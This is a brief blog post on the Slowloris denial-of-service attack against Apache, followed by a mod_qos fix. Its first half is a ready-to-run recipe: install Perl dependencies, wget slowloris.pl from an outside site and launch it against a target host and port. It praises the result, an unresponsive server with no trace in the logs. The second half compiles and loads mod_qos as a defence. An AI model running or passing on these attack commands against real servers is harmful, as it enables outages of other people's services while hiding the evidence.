Apache Denial of Service (DoS) attack with
Slowris / Crashing Apache
A friend of mine pointed me to a nice tool that is able to create a
succesful denial of service to
most of the running web servers out there. The tools is called
slowris
For any further information there is
the following publication on
ha.ckers.org about slowris
The original article of the friend of mine is
located on
his (mpetrov.net) person blog.
Unfortunately the post is in Bulgarian so it's not a match for
English speaking audience.
To launch the attack on Debian Linux all you need is:
# apt-get install libio-all-perl libio-socket-ssl-perl
# wget http://ha.ckers.org/slowloris/slowloris.pl
now issue the attack
# perl slowloris.pl -dns example.com -port 80 -timeout 1 -num 200 -cache
There you go the Apache server is not responding, no-traces of the
DoS are left on the server,
the log file is completely clear of records!</ br> The fix to
the attack comes with installing the not so popular Apache module:
mod_qos
# cd /tmp/
# wget http://freefr.dl.sourceforge.net/project/mod-qos/mod-qos/9.7/mod_qos-9.7.tar.gz
# tar zxvf mod_qos-9.7.tar.gz
# cd mod_qos-9.7/apache2/
# apxs2 -i -c mod_qos.c
The module is installing to "/usr/lib/apache2/modules"
All left is configuring the module
# cd /etc/apache2/mods-available/
#vim qos.load
Add the following in the file:
LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so
Cheers!
I should express my gratitude to
Martin Petrov's blog for the great
info.